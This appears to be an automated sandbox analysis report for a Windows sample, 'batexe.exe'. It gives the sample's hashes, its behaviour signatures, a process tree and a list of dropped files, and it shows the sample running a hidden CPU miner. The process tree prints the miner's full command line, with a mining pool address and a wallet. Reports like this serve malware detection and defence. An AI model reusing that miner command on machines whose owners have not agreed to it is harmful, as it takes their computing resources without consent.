Analysis
-
max time kernel
295s -
max time network
305s -
platform
windows10-1703_x64 -
resource
win10-20240221-ja -
resource tags
arch:x64arch:x86image:win10-20240221-jalocale:ja-jpos:windows10-1703-x64systemwindows -
submitted
24/02/2024, 01:05
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240221-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20240221-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 668 b2e.exe 4768 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 4768 cpuminer-sse2.exe 4768 cpuminer-sse2.exe 4768 cpuminer-sse2.exe 4768 cpuminer-sse2.exe 4768 cpuminer-sse2.exe -
resource yara_rule behavioral1/memory/1928-5-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1928 wrote to memory of 668 1928 batexe.exe 73 PID 1928 wrote to memory of 668 1928 batexe.exe 73 PID 1928 wrote to memory of 668 1928 batexe.exe 73 PID 668 wrote to memory of 3908 668 b2e.exe 74 PID 668 wrote to memory of 3908 668 b2e.exe 74 PID 668 wrote to memory of 3908 668 b2e.exe 74 PID 3908 wrote to memory of 4768 3908 cmd.exe 77 PID 3908 wrote to memory of 4768 3908 cmd.exe 77
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Users\Admin\AppData\Local\Temp\AC7C.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\AC7C.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\AC7C.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:668 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B0F1.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:3908 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4768
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1024KB
MD555d3fcf113506e85b6cf485f08b11290
SHA1539d601fdd7e37fe22412d8c73023e21293ac62c
SHA256519083ea4de496637895b9c3dd7fa5d9fc1140325272570f09aa0d2bad46f2d3
SHA51262c0dc6a36ef819eede73c8b041fbdf579ec0ae399654a73a4628555bb84c4e1fdcf314deb659f41986204e2d92acd886dd8735a24a150a309d4035b58a33ee4
-
Filesize
832KB
MD5e1bd95ac3f9c6ce43914de2a53967fee
SHA13e03982c075df051d5a8dd837f42873f30483faf
SHA25645c3475b58fbaa942be0297167c5c3fbbfe7295aa3fcbb4fb61df1348f55c550
SHA5122166424e86301bbe04fbcce5d0b91562248845c5b1a7e889fee9a95d1c872dd6ea5cc85792b54e6d085095339be2f2b7f30cfd9b40a071b51c96a5009cc96f00
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
655KB
MD58fc9e04e7c5e9e89b785f4f086b5adb8
SHA1605748b928cf7193bf9d291a08492cc28e0ad267
SHA2562025bf7e44f25eaf3cf68435484f9b72be19244225c215420f78fec72f7f5723
SHA512d77540c4e3f4ac537f05b4102fe1ab8634c086dada0d4c0e1712a299cda0b9922e33da931dddc34436dd4d899d610d358686905ef7615b12fe49a40532e5a3cc
-
Filesize
705KB
MD54701e167a80d83b2750f710c115371ea
SHA1aff8819c3c47a4b325352e273aa32faeb4485f45
SHA25684be6b2eefe3d0606e9319addd4f2e541dae7ce188c3fc3b5437c5b4f0a980a4
SHA5123a6ed5466f7ccc59783181896b98c585c130395400f74dcbac904d8c332cdba230cb9bbeaca2e93fca6e087a5f4131178540e799e3283ab82c6d483359f1915b
-
Filesize
798KB
MD503383dc3d1edcb3ae42bb181facbf5cb
SHA15831310f657fdb2ecb8093d9d919aa8d44dde61d
SHA256d7689f3bab0a6a8be8bdda87099b739fe6853a71487e169e1a4f1048b824b3de
SHA512750d87f6132f2ce83af51d97412b50f7b0cbc353f11dba49fbd6f5d8e20547084f9010ddb6de275ae54199158ecb1653fd06701ac42687be9b79eda0484a36dd
-
Filesize
513KB
MD5a9d2ad3d82c5dcdff4a527634decc529
SHA13b1f8731622f2739bc5d90758ac3d82820bbc88f
SHA2565323ebc3f47dcfb6993d3471ef52cc1eaf08540c2a15c107532c24182a771704
SHA512152cf6f28009c8422e1114818ffb2e81f1f871449b5f0b5ac85a0e62033b4eefb2becd1fa4b145acfae38f249e4a33530b12c695dc5c6f54ded28ceadcf58fdc
-
Filesize
704KB
MD5ceb1ee23d68e973e400b41e7324c71b6
SHA10ad5540864cf9bcbf52870ba72566625ca54e67a
SHA25666f2f5bd30986e28a4c43ed44264cc56f63bd7a3ecd6aeb5845ac7bcd724aeee
SHA51251ce4a101517339cb1f5c23fc953dde73f871cec2bde8ea5c9fad9376366d7b8aadaa8668ef2f7bf9d873e8817345e4e337a7a94c42c3ddf6a168377af060e9c
-
Filesize
286KB
MD5dc673226ff3870885fe4791022d7faf2
SHA1053d91d56933ed3655faf761224cf32c319c2df7
SHA2563b04a2e74aa7150fc72a3f00f2d69f333d7a253d5ab912dd3069d1685ae0b1cf
SHA5121a05092327f3aa75dfde7863976ae037b42a9f6085986443bc68e14dab4d8bf2c9c81392f2a4693bad541db82b8e39a5182dfb68a8e63acad3c7f31f6f510953
-
Filesize
384KB
MD5d1d1f36cdbccda3b96e8c164afb74526
SHA191bafcd404c8568c9a195ec8cbf9592ea9e17e8b
SHA256ea6e726150aa9a8dcf9ccb6a991440b451f9f2dcc46d93cb35971556879d1d03
SHA5122306e6578ba2217b4f32913e1ac35e0547723b873c11244e96affd05457945373c621ea16a82e1e3aa1a177e3059efc40c8585118c63a3ea145524c51d1d18c9
-
Filesize
256KB
MD5f8edb8dd2fb15f1887ace09587589dd4
SHA1cbf7cbfefc0215d9500a98d9064deb9e86787152
SHA2560465270288d69a0ec9beb7114707bed76756c14148293237d0d35423abdfc67b
SHA512aa993112953225280c0bedb1ebd8288298b9c22a6a884a952ba60e48cbd21c4ce60724b7adc961a0528d7c569596e3420fec2670fc47c3eb6c00c691e0378abc
-
Filesize
181KB
MD53f842dcb9bc962182cf255a050f8495d
SHA1fbc47043525ec15121d3a69e65ef0b0fe48716a1
SHA256d4bf56735b9f91598a6c6276d42eb5665cb6ed6c216ef50b21592bfb8d2f590d
SHA5122aab32279e1dd67d03957166ff30a47f24efe12901ff94a962359be44067e7e8087496fb1238a7a6c57db17c9f7a828728aaa3d97a1d1e91799b4d1156b6c24b
-
Filesize
162KB
MD51721a947ff7a9c2e831584f2a7e877e3
SHA163dbb19d83a2d59127e098f66e63207a64f1d4bf
SHA2568f277ca0d489119f62888994da3b97a1225f0d61c3324c6669161c0dd73754f4
SHA5128decf94fc45dedff8dd705461a57873a751badba399cd3a93565e318b398b6ce8cca808e613c8fb3d4b2e7d6d2efe68601e88e904a68d6759a47b8a8b2bce493
-
Filesize
288KB
MD5e0d6963299ba4ace3c8db60be712d808
SHA1cf0def81253802c354f2c811c731bcb472f86211
SHA256dc46ef2d8573f5dedb256c0e3f787f186d6e9114d2189290de8b90e957dc13a4
SHA5128a64e9912a2e6ad79b316584a3c97474508bb13d725031f9ae051e1f05187109dbaaf795a7523249279c9f2d3e08eb026efd711111c6cc1e7240c7dc66cb87cb